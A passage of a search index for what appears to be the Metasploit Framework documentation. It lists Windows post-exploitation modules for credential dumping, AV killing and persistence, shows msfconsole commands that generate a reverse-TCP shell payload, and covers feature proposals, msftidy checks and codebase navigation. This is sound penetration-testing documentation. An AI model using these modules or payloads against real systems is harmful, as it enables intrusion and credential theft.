post/windows/gather/credentials/imvu | post/windows/gather/credentials/incredimail | post/windows/gather/credentials/kakaotalk | post/windows/gather/credentials/kmeleon | post/windows/gather/credentials/line | post/windows/gather/credentials/maxthon | post/windows/gather/credentials/mcafee_vse_hashdump | post/windows/gather/credentials/mdaemon_cred_collector | post/windows/gather/credentials/meebo | post/windows/gather/credentials/miranda | post/windows/gather/credentials/moba_xterm | post/windows/gather/credentials/mremote | post/windows/gather/credentials/mssql_local_hashdump | post/windows/gather/credentials/navicat | 
post/windows/gather/credentials/nimbuzz | post/windows/gather/credentials/opera | post/windows/gather/credentials/operamail | post/windows/gather/credentials/outlook | post/windows/gather/credentials/plsql_developer | post/windows/gather/credentials/postbox | post/windows/gather/credentials/pulse_secure | post/windows/gather/credentials/purevpn_cred_collector | post/windows/gather/credentials/qq | post/windows/gather/credentials/quassel_irc | post/windows/gather/credentials/razer_synapse | post/windows/gather/credentials/razorsql | post/windows/gather/credentials/rdc_manager_creds | post/windows/gather/credentials/redis_desktop_manager | post/windows/gather/credentials/safari | post/windows/gather/credentials/seamonkey | post/windows/gather/credentials/securecrt | post/windows/gather/credentials/skype | post/windows/gather/credentials/smartermail | post/windows/gather/credentials/smartftp | post/windows/gather/credentials/solarwinds_orion_dump | post/windows/gather/credentials/spark_im | post/windows/gather/credentials/srware | post/windows/gather/credentials/sso | post/windows/gather/credentials/steam | post/windows/gather/credentials/sylpheed | post/windows/gather/credentials/tango | post/windows/gather/credentials/teamviewer_passwords | post/windows/gather/credentials/thunderbird | post/windows/gather/credentials/thycotic_secretserver_dump | post/windows/gather/credentials/tlen | post/windows/gather/credentials/tortoisesvn | post/windows/gather/credentials/total_commander | post/windows/gather/credentials/trillian | post/windows/gather/credentials/veeam_credential_dump | post/windows/gather/credentials/viber | post/windows/gather/credentials/vnc | post/windows/gather/credentials/whatsupgold_credential_dump | post/windows/gather/credentials/winbox_settings | post/windows/gather/credentials/windows_autologin | post/windows/gather/credentials/windows_sam_hivenightmare | post/windows/gather/credentials/windowslivemail | post/windows/gather/credentials/winscp | 
post/windows/gather/credentials/wsftp_client | post/windows/gather/credentials/xchat | post/windows/gather/credentials/xshell_xftp_password | . | forensics (7) . | post/windows/gather/forensics/browser_history | post/windows/gather/forensics/duqu_check | post/windows/gather/forensics/enum_drives | post/windows/gather/forensics/fanny_bmp_check | post/windows/gather/forensics/imager | post/windows/gather/forensics/nbd_server | post/windows/gather/forensics/recovery_files | . | post/windows/gather/ad_to_sqlite | post/windows/gather/arp_scanner | post/windows/gather/avast_memory_dump | post/windows/gather/bitcoin_jacker | post/windows/gather/bitlocker_fvek | post/windows/gather/bloodhound | post/windows/gather/cachedump | post/windows/gather/checkvm | post/windows/gather/dnscache_dump | post/windows/gather/dumplinks | post/windows/gather/enum_ad_bitlocker | post/windows/gather/enum_ad_computers | post/windows/gather/enum_ad_groups | post/windows/gather/enum_ad_managedby_groups | post/windows/gather/enum_ad_service_principal_names | post/windows/gather/enum_ad_to_wordlist | post/windows/gather/enum_ad_user_comments | post/windows/gather/enum_ad_users | post/windows/gather/enum_applications | post/windows/gather/enum_artifacts | post/windows/gather/enum_av | post/windows/gather/enum_av_excluded | post/windows/gather/enum_chocolatey_applications | post/windows/gather/enum_chrome | post/windows/gather/enum_computers | post/windows/gather/enum_db | post/windows/gather/enum_devices | post/windows/gather/enum_dirperms | post/windows/gather/enum_domain | post/windows/gather/enum_domain_group_users | post/windows/gather/enum_domain_tokens | post/windows/gather/enum_domain_users | post/windows/gather/enum_domains | post/windows/gather/enum_emet | post/windows/gather/enum_files | post/windows/gather/enum_hostfile | post/windows/gather/enum_hyperv_vms | post/windows/gather/enum_ie | post/windows/gather/enum_logged_on_users | post/windows/gather/enum_ms_product_keys | 
post/windows/gather/enum_muicache | post/windows/gather/enum_onedrive | post/windows/gather/enum_patches | post/windows/gather/enum_powershell_env | post/windows/gather/enum_prefetch | post/windows/gather/enum_proxy | post/windows/gather/enum_putty_saved_sessions | post/windows/gather/enum_services | post/windows/gather/enum_shares | post/windows/gather/enum_snmp | post/windows/gather/enum_termserv | post/windows/gather/enum_tokens | post/windows/gather/enum_tomcat | post/windows/gather/enum_trusted_locations | post/windows/gather/enum_unattend | post/windows/gather/exchange | post/windows/gather/file_from_raw_ntfs | post/windows/gather/get_bookmarks | post/windows/gather/hashdump | post/windows/gather/local_admin_search_enum | post/windows/gather/lsa_secrets | post/windows/gather/make_csv_orgchart | post/windows/gather/memory_dump | post/windows/gather/memory_grep | post/windows/gather/netlm_downgrade | post/windows/gather/ntds_grabber | post/windows/gather/ntds_location | post/windows/gather/outlook | post/windows/gather/phish_windows_credentials | post/windows/gather/psreadline_history | post/windows/gather/resolve_sid | post/windows/gather/screen_spy | post/windows/gather/smart_hashdump | post/windows/gather/tcpnetstat | post/windows/gather/usb_history | post/windows/gather/win_privs | post/windows/gather/wmic_command | post/windows/gather/word_unc_injector | . | manage (51) . | powershell (3) . | post/windows/manage/powershell/build_net_code | post/windows/manage/powershell/exec_powershell | post/windows/manage/powershell/load_script | . 
| post/windows/manage/add_user | post/windows/manage/archmigrate | post/windows/manage/change_password | post/windows/manage/clone_proxy_settings | post/windows/manage/delete_user | post/windows/manage/dell_memory_protect | post/windows/manage/download_exec | post/windows/manage/driver_loader | post/windows/manage/enable_rdp | post/windows/manage/enable_support_account | post/windows/manage/exec_powershell | post/windows/manage/execute_dotnet_assembly | post/windows/manage/forward_pageant | post/windows/manage/hashcarve | post/windows/manage/ie_proxypac | post/windows/manage/inject_ca | post/windows/manage/inject_host | post/windows/manage/install_python | post/windows/manage/install_ssh | post/windows/manage/kerberos_tickets | post/windows/manage/killav | post/windows/manage/make_token | post/windows/manage/migrate | post/windows/manage/mssql_local_auth_bypass | post/windows/manage/multi_meterpreter_inject | post/windows/manage/nbd_server | post/windows/manage/peinjector | post/windows/manage/persistence_exe | post/windows/manage/portproxy | post/windows/manage/pptp_tunnel | post/windows/manage/priv_migrate | post/windows/manage/pxeexploit | post/windows/manage/reflective_dll_inject | post/windows/manage/remove_ca | post/windows/manage/remove_host | post/windows/manage/rid_hijack | post/windows/manage/rollback_defender_signatures | post/windows/manage/rpcapd_start | post/windows/manage/run_as | post/windows/manage/run_as_psh | post/windows/manage/sdel | post/windows/manage/shellcode_inject | post/windows/manage/sshkey_persistence | post/windows/manage/sticky_keys | post/windows/manage/vmdk_mount | post/windows/manage/vss | post/windows/manage/wdigest_caching | post/windows/manage/webcam | . | recon (2) . | post/windows/recon/computer_browser_discovery | post/windows/recon/outbound_ports | . | wlan (5) . 
| post/windows/wlan/wlan_bss_list | post/windows/wlan/wlan_current_connection | post/windows/wlan/wlan_disconnect | post/windows/wlan/wlan_probe_request | post/windows/wlan/wlan_profile | . | . | . | . | . ",
    "url": "/docs/modules.html#metasploit-modules",
    "relUrl": "/docs/modules.html#metasploit-modules"
  },"661": {
    "doc": "Modules",
    "title": "Module types",
    "content": "Auxiliary modules (1266) . Auxiliary modules do not exploit a target, but can perform useful tasks such as: . | Administration - Modify, operate, or manipulate something on target machine | Analyzing - Tools that perform analysis, mostly password cracking | Gathering - Gather, collect, or enumerate data from a single target | Denial of Service - Crash or slow a target machine or service | Scanning - Scan targets for known vulnerabilities | Server Support - Run Servers for common protocols such as SMB, FTP, etc | . Encoder modules (49) . Encoders take the raw bytes of a payload and run some sort of encoding algorithm, like bitwise XOR. These modules are useful for encoding bad characters such as null bytes. Evasion modules (9) . Evasion modules give Framework users the ability to generate evasive payloads that aim to evade AntiVirus, such as Windows Defender, without having to install external tools. Exploit modules (2460) . Exploit modules are used to leverage vulnerabilities in a manner that allows the framework to execute arbitrary code. The arbitrary code that is executed is referred to as the payload. Nop modules (11) . Nop modules, short for ‘No Operation’, generate a sequence of ‘No Operation’ instructions that perform no side-effects. NOPs are often used in conjunction with stack buffer overflows. Payloads modules (1468) . In the context of Metasploit exploit modules, payload modules encapsulate the arbitrary code (shellcode) that is executed as the result of an exploit succeeding. This normally involves the creation of a Metasploit session, but may instead execute code such as adding user accounts, or executing a simple pingback command that verifies that code execution was successful against a vulnerable target. Payload modules can also be used individually to generate standalone executables, or shellcode for use within exploits: . 
msf6 payload(linux/x86/shell_reverse_tcp) > back msf6 > use payload/linux/x86/shell_reverse_tcp msf6 payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1 lhost => 127.0.0.1 msf6 payload(linux/x86/shell_reverse_tcp) > set lport 4444 lport => 4444 # Generate a payload for use within C msf6 payload(linux/x86/shell_reverse_tcp) > generate -f c # Generate an ELF file for execution on Linux environments msf6 payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell . Post modules (430) . These modules are useful after a machine has been compromised and a Metasploit session has been opened. They perform useful tasks such as gathering, collecting, or enumerating data from a session. ",
    "url": "/docs/modules.html#module-types",
    "relUrl": "/docs/modules.html#module-types"
  },"662": {
    "doc": "Modules",
    "title": "Modules",
    "content": " ",
    "url": "/docs/modules.html",
    "relUrl": "/docs/modules.html"
  },"663": {
    "doc": "MSF6 Feature Proposals",
    "title": "Payloads and Post-exploitation",
    "content": "Meterpreter Transport and Scalability Overhaul . The Meterpreter Protocol “TLV” is enhanced to support modern features such as logging, unidirectional messages, obfuscation, sequence number reassembly and more. This feature will enable Meterpreter sessions to be more robust, faster, and evade detection with greater ease than before. Additionally, Meterpreter payload listeners, rather than being integrated straight into msfconsole, will run as an independent process that communicates with msfconsole (1 or more users) over RPC, similar to the msfdb_ws (Metasploit Database Web Service). The external listener then replaces the ‘metasploit-aggregator’ project by not requiring an intermediate proxy to park or share sessions; these are done directly by having the listeners independent of console users. Listener capabilities would be embeddable directly into Meterpreter payloads, so that local listeners and remote listeners internal to other networks could be implemented the same way, enabling greater scalability and facilitating pivoting across more complex networks, allowing better post-exploitation possibilities in modern network environments. Integration with external C2 frameworks . If listeners are externalized, then there is an API layer both for interactive interaction with remote sessions, and a way for the Post-exploitation API to communicate with the external sessions. That should mean that if an external C2 framework supports at minimum shell interaction, the bulk of the Post-exploitation API should be applicable against external C2 frameworks as well. Metasploit would then be able to integrate both with other open-source C2 frameworks, as well as private ones. Integration of native tool-chains . Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. 
Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like apktool for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle’s toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago. Native first-class UUID-aware, async stager payload . Make a new async payload type (based on pingback payload work) making secure comms, endpoint verification, and async communication first-class citizens, and on by default. These session types would support a much more limited set of actions than Meterpreter, only supporting sleep/upload/download/stage, but would be upgraded to Meterpreter directly as-needed (maybe even transparently). Network protocols can be much more exotic for this, and the listener/payload should be usable externally from Metasploit as well. Todo: pull in async payload proposal notes from @bwatters-r7. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#payloads-and-post-exploitation",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#payloads-and-post-exploitation"
  },"664": {
    "doc": "MSF6 Feature Proposals",
    "title": "Module Interface",
    "content": "Overhaul network targeting . Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc… to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc: . set TARGETS https://user:password@target_app:4343 https://target_app2 . Overhaul credential targeting . The credential datastore options also have many different co-dependent and independent variables, which are confusing and awkward to use. In addition, there is little in the way of user-parallelism for using login scanners against single-service web apps. MSF6 should have an easier, less messy overhaul of targeting multiple users and apps as well. Maybe TARGETS could be used the same way? . Collapse module types, expose module ‘abilities’ or ‘methods’ instead . Modules in Metasploit are classified according to what they can do (‘exploits can exploit, scanners can scan’) but often it’s useful to be able to scan for exploitable targets. Workarounds include reaching between modules and sharing library code and mixins. This proposal suggests that ‘exploit’ and ‘scanner’, as well as many other aux-type modules should collapse into a single module type. They simply expose capabilities like ‘scan’, ‘check’, ‘exploit’, etc. and a single module can do all of these. Additionally, ‘admin’ modules could be collapsed. For instance, why have a chromecast_reset and chromecast_youtube module when you can use ‘admin/chromecast’ and just type ‘cast’ or ‘reset’ as methods on this single module. This would also replace the ‘ACTIONS’ datastore option where they are used in multi-action aux modules. Integration with external exploitation frameworks . E.g. could we just use routersploit or wpsploit directly from within framework and gather loot/run post exploitation, etc. 
through them? Maybe using the external module RPC, just being able to expose multiple modules behind the same API? . Changing module structure on disk . Currently a non-trivial exploit module will require adding code to 4 different subdirectories (lib, modules, documentation, external) which makes it both hard to follow all of the moving pieces, but also makes it harder to extract modules for independent use. See Bundled Modules Proposal for a more detailed proposal. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#module-interface",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#module-interface"
  },"665": {
    "doc": "MSF6 Feature Proposals",
    "title": "Data Model",
    "content": "Temporal / log-oriented data model . Metasploit implements a standard Ruby-on-Rails CRUD model for storing data about an environment. A Host object is created, updated, deleted, etc. But, anything can update anything, making it easy to lose data, and hard to notice changes over time. A workaround is religious use of workspaces to segregate observations, but that’s more of a workaround. A log-structured data model (observations about hosts/loot/credentials/services, etc.) should just be objects that are imported into a datastore that prioritizes search over everything else. Relationships between objects should be loose and malleable, as the way the graph of how objects are related can and does change over time in modern environments, often on the order of hours or minutes. As a concrete example, say every report_* method just wrote a JSON blob into elasticsearch. Then you would have first observed data, and when something else happens, say a password is cracked, rather than modifying a credential object, there would just be an enrichment object added to the data store, and both could be matched together later. The current data model also often doesn’t have ways of storing arbitrary information from modules that need it; loot is often used as a workaround, but it’s not searchable by content. Providing a way to store arbitrary JSON from modules would allow the flexibility to store anything, search for anything, and to never lose anything. Also, services would be removable as well from the database when a service is down. Note: a temporal data model will likely need something better able to show data relations than the current tabular rex-table approach in msfconsole. Web UI? . Data model is always available . The database in Metasploit has historically been optional. Not everyone needs to store data and setting up and maintaining the database is often a burden to the user, with many possible failure modes. 
Having the data model not always be available often complicates Metasploit’s code, and made some features like UUID tracking for payloads difficult to implement reliably. Metasploit 5 added web services for the data model, which further complicated the code paths, adding a third way for behavior to possibly differ. We should make a light-weight in-memory database service that can run automatically if a persistent database is unavailable or unconfigured, which can always provide some sort of database service to Metasploit, even if it is ephemeral and exits when msfconsole/listeners, etc. have exited. framework.db should always exist, even if the data it stores goes into a temporary bit bucket. Then all of the conditional code paths can go away. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#data-model",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#data-model"
  },"666": {
    "doc": "MSF6 Feature Proposals",
    "title": "Infrastructure",
    "content": "First class user-oriented documentation . Provide a means for the community to document changes to how Metasploit works (developer and user), unify various documentation resources. Make Metasploit Higher-performance / lighter weight . As subcomponents get carved off (external database service, external listeners), they should be implemented in a lighter weight way. We have some prototypes of the database web service rewritten in golang, and a persistent payload generation service that can be used by a client-only msfvenom-like tool can speed up execution considerably. Sunsetting, separation of old module / code . Metasploit has some really old modules that probably don’t get used very often. Can we segregate these or sunset them so that the overall number of modules is reduced? . Integration of separate Metasploit projects into fewer repos (rex / payloads / metasploit data models) . Metasploit is spread out across over a dozen different repos. Let’s merge them as much as we can to make it easier to change them across the board (e.g. when changing the data model) and to make it easier to have parallel branches for stable/unstable work. ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html#infrastructure",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html#infrastructure"
  },"667": {
    "doc": "MSF6 Feature Proposals",
    "title": "MSF6 Feature Proposals",
    "content": "List of potential major features (things that would make major breaking changes) for MSF6: . ",
    "url": "/docs/development/propsals/msf6-feature-proposals.html",
    "relUrl": "/docs/development/propsals/msf6-feature-proposals.html"
  },"668": {
    "doc": "Msftidy",
    "title": "Description",
    "content": " ",
    "url": "/docs/development/quality/msftidy.html#description",
    "relUrl": "/docs/development/quality/msftidy.html#description"
  },"669": {
    "doc": "Msftidy",
    "title": "Checks",
    "content": " ",
    "url": "/docs/development/quality/msftidy.html#checks",
    "relUrl": "/docs/development/quality/msftidy.html#checks"
  },"670": {
    "doc": "Msftidy",
    "title": "File modes",
    "content": "This check ensures that modules are not marked executable. A module is only called by the framework and not directly. The correct file mode is 0644, which will ensure that other users are only able to read the file, and that the current user is only able to read and write the file, not execute it. ",
    "url": "/docs/development/quality/msftidy.html#file-modes",
    "relUrl": "/docs/development/quality/msftidy.html#file-modes"
  },"671": {
    "doc": "Msftidy",
    "title": "Shebang",
    "content": "A module should not have a Shebang line. ",
    "url": "/docs/development/quality/msftidy.html#shebang",
    "relUrl": "/docs/development/quality/msftidy.html#shebang"
  },"672": {
    "doc": "Msftidy",
    "title": "Nokogiri",
    "content": "Modules should not rely on the Nokogiri GEM. Please use REXML instead. ",
    "url": "/docs/development/quality/msftidy.html#nokogiri",
    "relUrl": "/docs/development/quality/msftidy.html#nokogiri"
  },"673": {
    "doc": "Msftidy",
    "title": "Invalid Formats",
    "content": "CVE . CVE references should be in the format YYYY-NNNN . BID . BID references should only contain numbers . MSB . OSVDB references should be in the format MSddd-ddd (d = digit) . MIL . Milw0rm references are no longer supported (site suspended) . EDB . EDB references should only contain numbers . US-CERT-VU . US-CERT references should only contain numbers . ZDI . ZDI references should be in the format dd-ddd or dd-dddd (d = digit) . URL . If you supply an URL where a short identifier is available, please use the identifier. ",
    "url": "/docs/development/quality/msftidy.html#invalid-formats",
    "relUrl": "/docs/development/quality/msftidy.html#invalid-formats"
  },"674": {
    "doc": "Msftidy",
    "title": "Old Keywords",
    "content": "Before Metasploit moved to Github the sources were stored in a SVN repository. SVN has support to replace custom variables with current values like the last revision. Since GIT does not support them, the references should be removed from code. ",
    "url": "/docs/development/quality/msftidy.html#old-keywords",
    "relUrl": "/docs/development/quality/msftidy.html#old-keywords"
  },"675": {
    "doc": "Msftidy",
    "title": "Verbose",
    "content": "You should not define a VERBOSE option in your module. A VERBOSE option is already provided by the framework. To make use of the VERBOSE setting, you can use methods like vprint_status and vprint_error . ",
    "url": "/docs/development/quality/msftidy.html#verbose",
    "relUrl": "/docs/development/quality/msftidy.html#verbose"
  },"676": {
    "doc": "Msftidy",
    "title": "Badchars",
    "content": "This check looks for bad characters in the module title. If you encounter this error, please replace the characters. ",
    "url": "/docs/development/quality/msftidy.html#badchars",
    "relUrl": "/docs/development/quality/msftidy.html#badchars"
  },"677": {
    "doc": "Msftidy",
    "title": "File Extension",
    "content": "All modules should have a .rb file extension to be loaded by the framework. ",
    "url": "/docs/development/quality/msftidy.html#file-extension",
    "relUrl": "/docs/development/quality/msftidy.html#file-extension"
  },"678": {
    "doc": "Msftidy",
    "title": "Old Rubies",
    "content": "This check scans the file for syntax errors under old Ruby versions. By default this check will not run. To execute this check you need to set the environment variable MSF_CHECK_OLD_RUBIES. ",
    "url": "/docs/development/quality/msftidy.html#old-rubies",
    "relUrl": "/docs/development/quality/msftidy.html#old-rubies"
  },"679": {
    "doc": "Msftidy",
    "title": "Ranking",
    "content": "This check ensures you added the correct Exploit Ranking to your module. ",
    "url": "/docs/development/quality/msftidy.html#ranking",
    "relUrl": "/docs/development/quality/msftidy.html#ranking"
  },"680": {
    "doc": "Msftidy",
    "title": "Disclosure Date",
    "content": "Date format needs to be Month Day, YYYY. Example: Jan 01, 2014 . ",
    "url": "/docs/development/quality/msftidy.html#disclosure-date",
    "relUrl": "/docs/development/quality/msftidy.html#disclosure-date"
  },"681": {
    "doc": "Msftidy",
    "title": "Title Casing",
    "content": "This check ensures you used the correct case in your title. ",
    "url": "/docs/development/quality/msftidy.html#title-casing",
    "relUrl": "/docs/development/quality/msftidy.html#title-casing"
  },"682": {
    "doc": "Msftidy",
    "title": "Bad Terms",
    "content": "This checks for the correct use of the terms Stack Buffer overflow and Stack Exhaustion. See “Stack exhaustion” vs “Stack buffer overflow” for more information. ",
    "url": "/docs/development/quality/msftidy.html#bad-terms",
    "relUrl": "/docs/development/quality/msftidy.html#bad-terms"
  },"683": {
    "doc": "Msftidy",
    "title": "Function Arguments",
    "content": "If you define a function which defines a lot of input arguments, the check ensures you use a hash instead. ",
    "url": "/docs/development/quality/msftidy.html#function-arguments",
    "relUrl": "/docs/development/quality/msftidy.html#function-arguments"
  },"684": {
    "doc": "Msftidy",
    "title": "Line Check",
    "content": "Unicode . Your module must not contain Unicode characters. Spaces at EOL . Your module must not contain spaces at the end of a line. Mixed Tab Spaces . Your module contains Tabs and Spaces in one line. Only spaces should be used . Tabs . Your module should not use tabs for indenting code. Please use spaces instead. Carriage return . The specified line only contains a carriage return (\\r) at the end of line. Please change to a normal linebreak (\\n or \\r\\n). File.open . You used a File.open call without specifying a binary mode. Load . You used the load command in your module. This is not required since the framework loads all necessary files for you. STDOUT . Modules should not write directly to stdout. Please use the print_* functions instead. Modified datastore . Datastore options (options set by the user) should not be modified in code. If you need to change some values use local variables instead. Set-Cookie . The Set-Cookie header should not be parsed by your code. You can use the API call res.get_cookies instead, which already handles some special cases and ensures a clean header. Auxiliary Rank . Auxiliary modules should have no Rank. Only Exploits and Payloads should have a Rank attribute. ",
    "url": "/docs/development/quality/msftidy.html#line-check",
    "relUrl": "/docs/development/quality/msftidy.html#line-check"
  },"685": {
    "doc": "Msftidy",
    "title": "Snake Case",
    "content": "This check ensures your module filename is in Snake Case . ",
    "url": "/docs/development/quality/msftidy.html#snake-case",
    "relUrl": "/docs/development/quality/msftidy.html#snake-case"
  },"686": {
    "doc": "Msftidy",
    "title": "Old License",
    "content": "This check looks for the old Metasploit license in the module header. You can use the tool ruby tools/dev/resplat.rb <filename> to convert the file. ",
    "url": "/docs/development/quality/msftidy.html#old-license",
    "relUrl": "/docs/development/quality/msftidy.html#old-license"
  },"687": {
    "doc": "Msftidy",
    "title": "VULN Codes",
    "content": "This check ensures only known CheckCodes are returned by the check function. ",
    "url": "/docs/development/quality/msftidy.html#vuln-codes",
    "relUrl": "/docs/development/quality/msftidy.html#vuln-codes"
  },"688": {
    "doc": "Msftidy",
    "title": "vars_get",
    "content": "When using send_request_cgi or send_request_raw the URL supplied should not contain GET parameters. Please provide the parameters via the vars_get hash. bad: . res = send_request_raw({ 'uri' => uri_base + '/upload.php?type=file&folder=' + folder }) . good: . res = send_request_raw({ 'uri' => uri_base + '/upload.php', 'vars_get' => { 'type' => 'file', 'folder' => folder } }) . ",
    "url": "/docs/development/quality/msftidy.html#vars_get",
    "relUrl": "/docs/development/quality/msftidy.html#vars_get"
  },"689": {
    "doc": "Msftidy",
    "title": "Msftidy",
    "content": " ",
    "url": "/docs/development/quality/msftidy.html",
    "relUrl": "/docs/development/quality/msftidy.html"
  },"690": {
    "doc": "Navigating the codebase",
    "title": "Overview",
    "content": "One of the most important things to learn when first working with Metasploit is how to navigate Metasploit’s codebase. However, its often not immediately clear how this should be done. This page aims to explain some of the different approaches that one can take when navigating Metasploit’s codebase and provides a primer for learning how Metasploit’s codebase is structured. A quick reminder before we get started, but one can always access the Metasploit Slack at https://metasploit.slack.com/. Normally this page should allow you to sign up, however if for any reason you cannot, feel free to shoot an email to msfdev at rapid7 dot com and we will be happy to send you an invite link. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#overview",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#overview"
  },"691": {
    "doc": "Navigating the codebase",
    "title": "Metasploit Code Structure",
    "content": "A great outline of Metasploit’s code structure can be found at https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/, which should be referred to for an overview of Metasploit’s code structure. To repeat what is said there there are the following main subdirectories: . | data - Our general data storage area. Used to store wordlists for use by modules, binaries that are used by exploits, images, and more. | db - Holds the Metasploit module database information. The modules_metadata_base.json file here gets updated every time a new module is pushed into the framework or the properties of one gets updated, so that Metasploit can do things like autocompleting module names. | docker - Files related to building a docker instance of Metasploit Framework. | documentation - This is the documentation directory. Every module that has been landed within the last 3-4 years is required to have documentation along with the exploit code. You may find older exploits do not have documentation; if you’d like to help out with this we have an open task at https://github.com/rapid7/metasploit-framework/issues/12389 for adding missing documentation to some auxiliary modules. | external - Used as a storage area for the source code of the binaries that modules might depend on, as well as burpsuite, zsh tab completion, and a Metasploit specific fork of the serialport project. | lib - Where all the library code goes. If your working on something that could affect multiple modules, that code will likely be contained in a library stored under this directory. | modules - All modules are stored under this directory, and are further broken down into several categories. | modules/exploit - Stores exploit modules which generally tend to gain you a shell of some sort. | modules/auxiliary - Stores auxiliary modules, which are used to gain information and generally don’t gain a shell. 
| modules/post - Stores post modules which perform useful actions after one has gained access to a target. | modules/encoders - Stores encoder modules which are used to encode various payloads to help avoid bad characters or provide additional obfuscation. | modules/evasion - Stores evasion modules which are used to help avoid antivirus. | modules/nops - Stores NOP modules used for generating NOP shellcode for various architectures. | plugins - Used for storing various Metasploit plugins that allow Metasploit to integrate with other programs or import data from other programs. | scripts - Stores various scripts used within Metasploit, such as Meterpreter, and scripts for the console interface of Metasploit Framework. | spec - Contains various RSpec checks that are used to ensure libraries and core functionality within the framework are working as expected. If you are writing a new library or adjusting one, you may need to update the corresponding RSpec file within this directory to ensure the specification checks are updated to reflect the new behavior. | test - Contains tests for various parts of Metasploit code to ensure they are operating as expected. | tools - Contains various tools that may be helpful under different situations. The dev directory contains tools useful during development, such as tools/dev/msftidy_docs.rb which helps ensure your documentation is in line with standards.~~ | . ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#metasploit-code-structure",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#metasploit-code-structure"
  },"692": {
    "doc": "Navigating the codebase",
    "title": "Code Navigation Tools",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#code-navigation-tools",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#code-navigation-tools"
  },"693": {
    "doc": "Navigating the codebase",
    "title": "GitHub Code Navigation",
    "content": "You can search through the code of Metasploit using GitHub with searches such as https://github.com/rapid7/metasploit-framework/search?l=Ruby&amp;amp;q=%22payload.arch%22&amp;amp;type=code. Note that double quotes are required to match specifically on a certain term; in the previous example this term was payload.arch. You can also set the type=code parameter to specifically match only on code results, however this can be set to commits or issues if you want to search commits or issues instead. Finally notice that when searching code, its important to also specify the language of the files you want to match. In the case above I made it so that my results would only match on files deemed by GitHub to contain Ruby code, however you can also specify other languages such as Batch, or C if you want those languages instead. You can even remove the language restriction if you find your search results are too narrow. Another incredibly useful feature of GitHub is the ability to search across all repositories that an organization owns. This is especially useful in Metasploit as certain components, such as Rex code and payload code, may be contained in repositories other than metasploit-framework. To search across the public repositories that Rapid7 owns, use a search such as https://github.com/search?q=org%3Arapid7+%22payload.arch%22&amp;amp;type=code. Note the presence of the org:rapid7 tag within the previous URL: this tells GitHub to look through all repositories that Rapid7 owns for the term payload.arch within any code files. Experiment with these results and play around with GitHub searches more. Over time you will learn where it is useful and where it has its limitations and will be able to determine when it might be better to use an IDE to help understand a piece of code more. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#github-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#github-code-navigation"
  },"694": {
    "doc": "Navigating the codebase",
    "title": "SolarGraph Code Navigation",
    "content": "A better way to navigate code, particularly across repos, and also find out where things are defined using an easy to use interface, is SourceGraph from https://sourcegraph.com. The interface is not hard to use and you can find several tutorials over at https://docs.sourcegraph.com/tutorials on how to use it. The main benefit of SourceGraph over GitHub is the ability to search all known repositories at once and then easily jump between definitions using either the online search at https://sourcegraph.com/search, or the GitHub integrated browser plugin from https://docs.sourcegraph.com/integration/browser_extension to allow easy navigation of Metasploit and Rapid7 code from your GitHub PR reviews. It is also recommended to review the tutorials and better understand some of the advanced search capabilities of SourceGraph as they do provide some useful search functionality that is not available or may be harder to perform with GitHub. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation"
  },"695": {
    "doc": "Navigating the codebase",
    "title": "IDE Code Navigation",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#ide-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#ide-code-navigation"
  },"696": {
    "doc": "Navigating the codebase",
    "title": "RubyMine Code Navigation",
    "content": "One of the best ways to navigate the codebase within Metasploit is to use RubyMine, available from https://www.jetbrains.com/ruby/. Whilst it is a paid tool, it offers a variety of neat referencing finding features such as the ability to right click on a method name and select Find Usages, or to right click the method name and select Go To -&amp;gt; Declaration or Usages to find all the locations where that method might of been defined within the codebase, which can make tracing complex definitions that wind between library and module code much easier. RubyMine also offers autocompletion and integrates well with many tools such as Git to allow you to quickly switch branches and RuboCop to help provide suggestions on where your code style could be improved. For a cheaper option one can also use VS Code. Note however that VS Code does not have the best autotab completion and will not allow you to trace references, however if your willing to put up with this, it is a much faster and more lightweight product than RubyMine, which makes it great for those times when you just need to edit a piece of code without loading a bunch of related files that you don’t need to reference or edit. It also has great regex search features that work much faster than RubyMine, allowing you to search for items within the codebase a lot quicker than you can with RubyMine, which will often seem to stutter at times due to its larger overhead. Ultimately though the tool that you pick should be up to you. Some may prefer to work with vim/nano/emacs or some other command line editor over a GUI interface. Use whatever you can afford and feels comfortable to you! . ",
